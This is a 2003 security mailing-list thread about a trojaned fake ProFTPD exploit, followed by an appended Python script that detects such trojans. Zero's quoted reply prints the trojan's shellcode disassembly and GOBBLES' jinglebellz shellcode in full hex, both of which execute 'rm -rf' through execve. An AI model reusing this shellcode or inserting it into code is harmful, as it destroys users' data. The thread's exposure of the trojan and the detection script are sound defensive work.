Message-ID: <F2LQDWB3KDHXHUGHCLEJBXEOFRDQDZONIPEDLZOD@ziplip.com>
From: mitch_hurrison at ziplip.com (mitch_hurrison@...lip.com)
Subject: Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit)
Hi list,
Hrmm. Ok I'm no Sherlock Holmes but even I could see through this
'analysis'. This is obviously an elaborate attempt to soil the reputations of the fine people, dare I say heroes of information
security, at GOBBLES security.
Let's examine the case at hand:
1) Someone makes the effort of cutting up an existing public GOBBLES
shellcode. An act that requires just as much effort as writing
original opcode.
2) This cut-up version is used in a 'trojan' even my grandmother
would be able to spot. (Obscure in-exploit overflows are way more
effective folks, ask HD "I pioneered screensavers" Moore).
3) Some random hero pops up on the list pointing out that
'hey, this is GOBBLES shellcode *WINK*'
Now who, on God's green earth, would recognise shellcode from
an obscure exploit that was published months ago, if they
didn't have it fresh in memory?
So I think it's rather obvious that either zeroboy or one of his
friends is responsible for this trojan. And he has some sort of
grudge towards GOBBLES. Either that or he
has a serious hardon for memorising hex opcode buffers.
With regards,
Mitch
> -----Original Message-----
> From: zero [mailto:zeroboy@...akis.es]
> Sent: Friday, October 24, 2003, 1:19 PM
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit
>
>
> Hmmm, let's see:
>
> Dump of assembler code for function shellcode:
> 0x08049480 <shellcode+0>: xor %eax,%eax
> 0x08049482 <shellcode+2>: push %eax
> 0x08049483 <shellcode+3>: push $0x582f2066
> 0x08049488 <shellcode+8>: push $0x722d206d
> 0x0804948d <shellcode+13>: push $0x7258632d
> 0x08049492 <shellcode+18>: push $0x41414141
> 0x08049497 <shellcode+23>: push $0x41414141
> 0x0804949c <shellcode+28>: push $0x41414141
> 0x080494a1 <shellcode+33>: push $0x41414141
> 0x080494a6 <shellcode+38>: push $0x4368732f
> 0x080494ab <shellcode+43>: push $0x6e69622f //
> /bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X
> 0x080494b0 <shellcode+48>: xor %eax,%eax
> 0x080494b2 <shellcode+50>: mov %al,0x7(%esp,1)
> 0x080494b6 <shellcode+54>: mov %al,0x1a(%esp,1)
> 0x080494ba <shellcode+58>: mov %al,0x23(%esp,1)
> 0x080494be <shellcode+62>: mov %esp,0x8(%esp,1)
> 0x080494c2 <shellcode+66>: xor %ebx,%ebx
> 0x080494c4 <shellcode+68>: lea 0x18(%esp,1),%ebx
> 0x080494c8 <shellcode+72>: mov %ebx,0xc(%esp,1)
> 0x080494cc <shellcode+76>: xor %ebx,%ebx
> 0x080494ce <shellcode+78>: lea 0x1b(%esp,1),%ebx
> 0x080494d2 <shellcode+82>: mov %ebx,0x10(%esp,1)
> 0x080494d6 <shellcode+86>: mov %eax,0x14(%esp,1)
> 0x080494da <shellcode+90>: xor %ebx,%ebx
> 0x080494dc <shellcode+92>: mov %esp,%ebx
> 0x080494de <shellcode+94>: lea 0x8(%esp,1),%ecx
> 0x080494e2 <shellcode+98>: xor %edx,%edx
> 0x080494e4 <shellcode+100>: lea 0x14(%esp,1),%edx
> 0x080494e8 <shellcode+104>: mov $0xb,%al
> 0x080494ea <shellcode+106>: int $0x80
> 0x080494ec <shellcode+108>: xor %ebx,%ebx
> 0x080494ee <shellcode+110>: xor %eax,%eax
> 0x080494f0 <shellcode+112>: inc %eax
> 0x080494f1 <shellcode+113>: int $0x80
> 0x080494f3 <shellcode+115>: add %al,(%eax)
> End of assembler dump.
>
> Let's give credit to the original c0d3rs of this shellcode. Nobody
> remembers jinglebellz.c?
>
> <snip>
> /*
> jinglebellz.c - local/remote exploit for mpg123
> (c) 2003 GOBBLES Security seXForces
>
> [...]
>
> unsigned char linux_shellcode[] = /* contributed by antiNSA */
> "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
> "\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
> "\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
> "\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
> "\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
> "\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
> "\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
> "\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
> "\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
> "\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
> "\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
> "\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
> "\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
> "\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
> "\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
> "\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
> "\x80\x31\xdb\x31\xc0\x40\xcd\x80";
>
> </snip>
>
> Well well, just a nice copy paste of some of it? :pPpPpPppP
>
> And the exact cmd is:
> execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL})
>
> NOTE: In this one, ~ is changed for a nicer one: /
>
> Have a nice turkey.
>
> Cheerz
>
>
>
> www.citfi.org
> www.podergeek.com
> **********************************
> "The further backward you look, the further forward you can see" Winston
> Churchill
> "Access is GOD..."
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
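As an added triage example (not code from this thread, nor from GOBBLES or zero), the Python below recovers the strings a push-imm32 shellcode builds on the stack, applies its NUL patches and pointer stores, and flags a destructive rm, so a trojaned "exploit" like the one above can be spotted without running it. The sample bytes are re-encoded from the disassembly and the jinglebellz tail quoted above; the al == 0 assumption in the NUL-write rule is stated in the code.

```python
import re

# "push $imm32" (0x68 + 4 bytes) repeated: how the shellcode above spells
# "/bin/sh ... -c ... rm -rf /" onto the stack four bytes at a time.
PUSH_RUN = re.compile(rb"(?:\x68.{4})+", re.S)
# mov %al,disp8(%esp): byte store used as a NUL terminator. Assumes al == 0,
# true here because "xor %eax,%eax" precedes it; a real tool would track eax.
STORE8 = re.compile(rb"\x88\x44\x24(.)", re.S)
# mov r32,disp8(%esp): 4-byte pointer store, so those bytes stop being text.
STORE32 = re.compile(rb"\x89[\x44\x4c\x54\x5c\x64\x6c\x74\x7c]\x24(.)", re.S)
DESTRUCTIVE = re.compile(r"\brm\s+-\w*r\w*\s+[/~]")


def stack_strings(code: bytes) -> list[str]:
    """Recover the NUL-separated C strings each push run leaves on the stack."""
    found = []
    for run in PUSH_RUN.finditer(code):
        raw = run.group()
        imms = [raw[i + 1:i + 5] for i in range(0, len(raw), 5)]
        buf = bytearray(b"".join(reversed(imms)))  # last push lands lowest
        tail = code[run.end():]
        for m in STORE8.finditer(tail):
            off = m.group(1)[0]
            if off < len(buf):
                buf[off] = 0
        for m in STORE32.finditer(tail):
            off = m.group(1)[0]
            buf[off:off + 4] = bytes(len(buf[off:off + 4]))
        found += [s.decode("latin-1") for s in buf.split(b"\x00") if s]
    return found


def triage(code: bytes) -> tuple[list[str], list[str]]:
    """Return (all recovered strings, those that look like a destructive rm)."""
    strings = stack_strings(code)
    return strings, [s for s in strings if DESTRUCTIVE.search(s)]


# Constructed samples, re-encoded from the disassembly and hex quoted above.
PUSHES = "686d202d72682d635872" + "6841414141" * 4 + "682f736843682f62696e"
EXEC = "".join(["31c0", "88442407", "8844241a", "88442423", "89642408", "31db",
                "8d5c2418", "895c240c", "31db", "8d5c241b", "895c2410", "89442414",
                "31db", "89e3", "8d4c2408", "31d2", "8d542414", "b00b", "cd80",
                "31db", "31c0", "40", "cd80"])
TROJAN = bytes.fromhex("31c050" + "6866202f58" + PUSHES + EXEC)  # pushes "f /X"
JINGLEBELLZ_TAIL = bytes.fromhex("31c031db31c931d2" + "6866207e58" + PUSHES + EXEC)  # "f ~X"

if __name__ == "__main__":
    for name, code in (("trojan", TROJAN), ("jinglebellz", JINGLEBELLZ_TAIL)):
        print(name, triage(code))
```

The pointer stores at 0x8..0x14(%esp) overwrite the padding A's, which is why the recovered argv comes out as exactly the execve call zero wrote out.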